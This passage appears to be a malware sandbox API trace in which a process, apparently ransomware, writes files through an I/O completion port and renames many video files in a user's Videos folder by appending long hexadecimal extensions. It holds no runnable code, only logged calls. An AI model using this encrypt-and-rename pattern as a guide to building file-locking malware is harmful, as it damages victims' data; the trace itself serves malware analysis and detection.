hFile=0x5b4, lpBuffer=0x78e1d58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1c20 | out: lpBuffer=0x78e1d58*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1c20) returned 1 
[0169.075] RtlInterlockedCompareExchange64 () returned 0x11 [0169.075] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.075] WriteFile (in: hFile=0x5d8, lpBuffer=0x7909eb0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9d78 | out: lpBuffer=0x7909eb0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9d78) returned 1 [0169.077] RtlInterlockedCompareExchange64 () returned 0x12 [0169.077] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.077] WriteFile (in: hFile=0x598, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0169.080] RtlInterlockedCompareExchange64 () returned 0x13 [0169.080] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.080] WriteFile (in: hFile=0x58c, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0169.082] RtlInterlockedCompareExchange64 () returned 0x14 [0169.082] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.082] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x7532658, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7532658, ReturnLength=0x73dfc54) returned 0x0 [0169.083] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv", lpString2=".40D562385B091262DA4A8D354C00AD020242811ECFC5C3CEE1AFDE510F948F6B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv.40D562385B091262DA4A8D354C00AD020242811ECFC5C3CEE1AFDE510F948F6B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv.40D562385B091262DA4A8D354C00AD020242811ECFC5C3CEE1AFDE510F948F6B" [0169.083] GetProcessHeap () returned 0x270000 [0169.084] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x174) returned 0x427b320 [0169.084] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x73dfc44, FileInformation=0x427b320, Length=0x174, FileInformationClass=0xa) returned 0x0 [0169.086] CloseHandle (hObject=0x5a8) returned 1 [0169.087] GetProcessHeap () returned 0x270000 [0169.088] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75325a8 | out: hHeap=0x270000) returned 1 [0169.088] RtlInterlockedCompareExchange64 () returned 0x15 [0169.088] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.089] NtQueryObject (in: Handle=0x5c4, ObjectInformationClass=0x1, ObjectInformation=0x755a7b0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: 
ObjectInformation=0x755a7b0, ReturnLength=0x73dfc54) returned 0x0 [0169.090] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4", lpString2=".648094A637C345B24447E4B8016FF3295BD7714D9C103ABF3EDC2AF93F931507" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4.648094A637C345B24447E4B8016FF3295BD7714D9C103ABF3EDC2AF93F931507") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4.648094A637C345B24447E4B8016FF3295BD7714D9C103ABF3EDC2AF93F931507" [0169.090] GetProcessHeap () returned 0x270000 [0169.090] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16c) returned 0x7733310 [0169.090] NtSetInformationFile (FileHandle=0x5c4, IoStatusBlock=0x73dfc44, FileInformation=0x7733310, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0169.092] CloseHandle (hObject=0x5c4) returned 1 [0169.093] GetProcessHeap () returned 0x270000 [0169.094] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a700 | out: hHeap=0x270000) returned 1 [0169.094] RtlInterlockedCompareExchange64 () returned 0x14 [0169.094] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.095] NtQueryObject (in: Handle=0x5c8, ObjectInformationClass=0x1, ObjectInformation=0x76b8fa8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76b8fa8, ReturnLength=0x73dfc54) returned 0x0 [0169.096] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi", 
lpString2=".40194D75F132EFFF11CC8A4C4D1B02A9F17BF041A0C6CDED0F8B496644D1E01C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi.40194D75F132EFFF11CC8A4C4D1B02A9F17BF041A0C6CDED0F8B496644D1E01C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CEqDre8Jxqkiwy.avi.40194D75F132EFFF11CC8A4C4D1B02A9F17BF041A0C6CDED0F8B496644D1E01C" [0169.096] GetProcessHeap () returned 0x270000 [0169.096] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x172) returned 0x427b4a8 [0169.096] NtSetInformationFile (FileHandle=0x5c8, IoStatusBlock=0x73dfc44, FileInformation=0x427b4a8, Length=0x172, FileInformationClass=0xa) returned 0x0 [0169.098] CloseHandle (hObject=0x5c8) returned 1 [0169.099] GetProcessHeap () returned 0x270000 [0169.100] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76b8ef8 | out: hHeap=0x270000) returned 1 [0169.100] RtlInterlockedCompareExchange64 () returned 0x13 [0169.100] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.100] NtQueryObject (in: Handle=0x5d0, ObjectInformationClass=0x1, ObjectInformation=0x76e1100, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76e1100, ReturnLength=0x73dfc54) returned 0x0 [0169.102] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv", lpString2=".B63045B8F937A3B595DF57C9DF31535545D9120036C0028E193A8B0C423B6069" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv.B63045B8F937A3B595DF57C9DF31535545D9120036C0028E193A8B0C423B6069") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\CO4O ON4.flv.B63045B8F937A3B595DF57C9DF31535545D9120036C0028E193A8B0C423B6069" [0169.102] GetProcessHeap () returned 0x270000 [0169.102] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x7421800 [0169.102] NtSetInformationFile (FileHandle=0x5d0, IoStatusBlock=0x73dfc44, FileInformation=0x7421800, Length=0x166, FileInformationClass=0xa) returned 0x0 [0169.105] CloseHandle (hObject=0x5d0) returned 1 [0169.106] GetProcessHeap () returned 0x270000 [0169.107] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e1050 | out: hHeap=0x270000) returned 1 [0169.107] RtlInterlockedCompareExchange64 () returned 0x12 [0169.107] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.107] NtQueryObject (in: Handle=0x5d4, ObjectInformationClass=0x1, ObjectInformation=0x7709258, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7709258, ReturnLength=0x73dfc54) returned 0x0 [0169.109] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi", lpString2=".AB561EBB344AFD7BB98F6479FA3C8C04BE5748BF64BE4DCD4BA5826CC5578327" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi.AB561EBB344AFD7BB98F6479FA3C8C04BE5748BF64BE4DCD4BA5826CC5578327") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa\\xa_lhgCiG.avi.AB561EBB344AFD7BB98F6479FA3C8C04BE5748BF64BE4DCD4BA5826CC5578327" [0169.109] GetProcessHeap () returned 0x270000 [0169.109] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 
Size=0x168) returned 0x7421978 [0169.109] NtSetInformationFile (FileHandle=0x5d4, IoStatusBlock=0x73dfc44, FileInformation=0x7421978, Length=0x168, FileInformationClass=0xa) returned 0x0 [0169.111] CloseHandle (hObject=0x5d4) returned 1 [0169.111] GetProcessHeap () returned 0x270000 [0169.113] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77091a8 | out: hHeap=0x270000) returned 1 [0169.125] RtlInterlockedCompareExchange64 () returned 0x11 [0169.125] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.125] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x75e00f8, ReturnLength=0x73dfc54) returned 0x0 [0169.126] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv", lpString2=".9294E5B187858D8756C37628C0FCE76F38B3D8FBD37641E49F2B0175814B1A16" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv.9294E5B187858D8756C37628C0FCE76F38B3D8FBD37641E49F2B0175814B1A16") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\fN8HPB62F.flv.9294E5B187858D8756C37628C0FCE76F38B3D8FBD37641E49F2B0175814B1A16" [0169.126] GetProcessHeap () returned 0x270000 [0169.126] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x4267c88 [0169.127] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x4267c88, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0169.129] CloseHandle (hObject=0x5ac) returned 1 [0169.129] GetProcessHeap () returned 0x270000 [0169.131] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.131] RtlInterlockedCompareExchange64 () returned 0x10 
[0169.131] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.132] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x7609258, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7609258, ReturnLength=0x73dfc54) returned 0x0 [0169.133] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi", lpString2=".DA29885B28F9F972465A7F1D5927102AFAB47EF17D8A98403E93A419EBE99F7E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi.DA29885B28F9F972465A7F1D5927102AFAB47EF17D8A98403E93A419EBE99F7E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi.DA29885B28F9F972465A7F1D5927102AFAB47EF17D8A98403E93A419EBE99F7E" [0169.133] GetProcessHeap () returned 0x270000 [0169.133] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x4332f38 [0169.133] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x73dfc44, FileInformation=0x4332f38, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0169.135] CloseHandle (hObject=0x4a8) returned 1 [0169.136] GetProcessHeap () returned 0x270000 [0169.138] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76091a8 | out: hHeap=0x270000) returned 1 [0169.138] RtlInterlockedCompareExchange64 () returned 0xf [0169.138] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.138] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76313b0, 
ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76313b0, ReturnLength=0x73dfc54) returned 0x0 [0169.139] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4", lpString2=".9286391ABF37FFBFE2BEAE2155B970285EFC7FEBE4E4E6C3B4B99EB1CEDD8858" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4.9286391ABF37FFBFE2BEAE2155B970285EFC7FEBE4E4E6C3B4B99EB1CEDD8858") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4.9286391ABF37FFBFE2BEAE2155B970285EFC7FEBE4E4E6C3B4B99EB1CEDD8858" [0169.139] GetProcessHeap () returned 0x270000 [0169.139] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x4267da0 [0169.139] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x73dfc44, FileInformation=0x4267da0, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0169.142] CloseHandle (hObject=0x5e4) returned 1 [0169.142] GetProcessHeap () returned 0x270000 [0169.143] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7631300 | out: hHeap=0x270000) returned 1 [0169.144] RtlInterlockedCompareExchange64 () returned 0xe [0169.144] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.144] NtQueryObject (in: Handle=0x5e0, ObjectInformationClass=0x1, ObjectInformation=0x7781210, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7781210, ReturnLength=0x73dfc54) returned 0x0 [0169.145] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi", lpString2=".C83F0E4083926DF4B4CE4072D64DF7805CEB03C97734BCF20A01A16EC190CE47" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L 
IUsBmama\\rU1a5NOEKgMT0KbZLa.avi.C83F0E4083926DF4B4CE4072D64DF7805CEB03C97734BCF20A01A16EC190CE47") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi.C83F0E4083926DF4B4CE4072D64DF7805CEB03C97734BCF20A01A16EC190CE47" [0169.145] GetProcessHeap () returned 0x270000 [0169.145] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x142) returned 0x42582c0 [0169.145] NtSetInformationFile (FileHandle=0x5e0, IoStatusBlock=0x73dfc44, FileInformation=0x42582c0, Length=0x142, FileInformationClass=0xa) returned 0x0 [0169.150] CloseHandle (hObject=0x5e0) returned 1 [0169.151] GetProcessHeap () returned 0x270000 [0169.152] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7781160 | out: hHeap=0x270000) returned 1 [0169.152] RtlInterlockedCompareExchange64 () returned 0xd [0169.152] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.152] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x77a9368, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x77a9368, ReturnLength=0x73dfc54) returned 0x0 [0169.154] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4", lpString2=".104AC395C9330E930A1CCBD3F99865F14621ACBB899B96FB513C2E3B8527A30A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4.104AC395C9330E930A1CCBD3F99865F14621ACBB899B96FB513C2E3B8527A30A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4.104AC395C9330E930A1CCBD3F99865F14621ACBB899B96FB513C2E3B8527A30A" [0169.154] GetProcessHeap () returned 0x270000 [0169.154] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x4258418 [0169.154] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x73dfc44, FileInformation=0x4258418, Length=0x144, FileInformationClass=0xa) returned 0x0 [0169.156] CloseHandle (hObject=0x304) returned 1 [0169.157] GetProcessHeap () returned 0x270000 [0169.158] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77a92b8 | out: hHeap=0x270000) returned 1 [0169.169] RtlInterlockedCompareExchange64 () returned 0xc [0169.169] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.170] NtQueryObject (in: Handle=0x5c0, ObjectInformationClass=0x1, ObjectInformation=0x77d14c0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x77d14c0, ReturnLength=0x73dfc54) returned 0x0 [0169.171] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv", lpString2=".3B1D37049E0656977EAE768E95FC10139B7B1BBD12F69722914594E67BFDAD1C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv.3B1D37049E0656977EAE768E95FC10139B7B1BBD12F69722914594E67BFDAD1C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv.3B1D37049E0656977EAE768E95FC10139B7B1BBD12F69722914594E67BFDAD1C" [0169.171] GetProcessHeap () returned 0x270000 [0169.171] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x146) returned 0x4258570 [0169.172] NtSetInformationFile (FileHandle=0x5c0, IoStatusBlock=0x73dfc44, FileInformation=0x4258570, Length=0x146, FileInformationClass=0xa) returned 0x0 [0169.173] CloseHandle (hObject=0x5c0) returned 1 [0169.175] GetProcessHeap () returned 0x270000 [0169.177] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x77d1410 | out: hHeap=0x270000) returned 1 [0169.180] RtlInterlockedCompareExchange64 () returned 0xb [0169.181] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.181] NtQueryObject (in: Handle=0x5bc, ObjectInformationClass=0x1, ObjectInformation=0x77f9618, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x77f9618, ReturnLength=0x73dfc54) returned 0x0 [0169.183] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4", lpString2=".AA94E9C7AD2BD86FB62DCD5E430E5563349AFD0315AE70222D27E7AF32895D68" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4.AA94E9C7AD2BD86FB62DCD5E430E5563349AFD0315AE70222D27E7AF32895D68") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4.AA94E9C7AD2BD86FB62DCD5E430E5563349AFD0315AE70222D27E7AF32895D68" [0169.183] GetProcessHeap () returned 0x270000 [0169.183] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x74186e0 [0169.184] NtSetInformationFile (FileHandle=0x5bc, IoStatusBlock=0x73dfc44, FileInformation=0x74186e0, Length=0x140, FileInformationClass=0xa) returned 0x0 [0169.186] CloseHandle (hObject=0x5bc) returned 1 [0169.187] GetProcessHeap () returned 0x270000 [0169.188] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77f9568 | out: hHeap=0x270000) returned 1 [0169.194] RtlInterlockedCompareExchange64 () returned 0xa [0169.194] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, 
lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.194] NtQueryObject (in: Handle=0x5e8, ObjectInformationClass=0x1, ObjectInformation=0x7821770, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7821770, ReturnLength=0x73dfc54) returned 0x0 [0169.196] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi", lpString2=".1FE166D1443CA1986B0B458CB5948FB554F16E1810F465C8BCCBEB0041DD072F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi.1FE166D1443CA1986B0B458CB5948FB554F16E1810F465C8BCCBEB0041DD072F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi.1FE166D1443CA1986B0B458CB5948FB554F16E1810F465C8BCCBEB0041DD072F" [0169.196] GetProcessHeap () returned 0x270000 [0169.196] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x7821008 [0169.196] NtSetInformationFile (FileHandle=0x5e8, IoStatusBlock=0x73dfc44, FileInformation=0x7821008, Length=0x150, FileInformationClass=0xa) returned 0x0 [0169.199] CloseHandle (hObject=0x5e8) returned 1 [0169.200] GetProcessHeap () returned 0x270000 [0169.201] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78216c0 | out: hHeap=0x270000) returned 1 [0169.203] RtlInterlockedCompareExchange64 () returned 0x9 [0169.203] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.204] NtQueryObject (in: Handle=0x5ec, ObjectInformationClass=0x1, ObjectInformation=0x78498c8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78498c8, ReturnLength=0x73dfc54) returned 0x0 [0169.205] lstrcatW (in: 
